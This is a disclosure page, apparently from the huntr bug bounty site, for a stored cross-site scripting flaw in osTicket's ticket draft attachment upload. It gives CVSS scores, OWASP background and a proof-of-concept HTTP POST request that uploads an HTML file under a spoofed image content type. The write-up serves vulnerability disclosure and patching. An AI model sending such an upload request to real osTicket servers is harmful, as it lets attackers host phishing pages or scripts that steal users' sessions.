Lucene search

K
huntrTheworstcomradeC2BB34AC-452D-4624-A1B9-C5B54F52F0CD
HistoryOct 18, 2021 - 8:47 p.m.

Cross-site Scripting (XSS) - Stored in osticket/osticket

2021-10-1820:47:48
theworstcomrade
www.huntr.dev
17

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

32.4%

Description

As it is written on github profile, osTicket is a widely-used open source support ticket system. During source code research I discovered bad uploaded file type check, which is controlled by user. Unauthenticated user can upload malicious html/js file.

FROM OWASP:: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

POST /ajax.php/draft/ticket.client.jfi710uc6f1h/attach HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------124988469840978117853377254190
Content-Length: 6456
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/open.php
Cookie: OSTSESSID=2h2moaijbnk5nojfi710uc6f1h

-----------------------------124988469840978117853377254190
Content-Disposition: form-data; name="file[]"; filename="osticket-phish.html"
Content-Type: image/png,text/html

<html>
<img src>
&lt;/html&gt;

-----------------------------124988469840978117853377254190--


PoC Video

https://www.youtube.com/watch?v=iasn6dEDnCw

Impact

FROM OWASP:: An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this case local link generated link is valid for few hours, and is visible by issue author and administrators.

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

32.4%

Related for C2BB34AC-452D-4624-A1B9-C5B54F52F0CD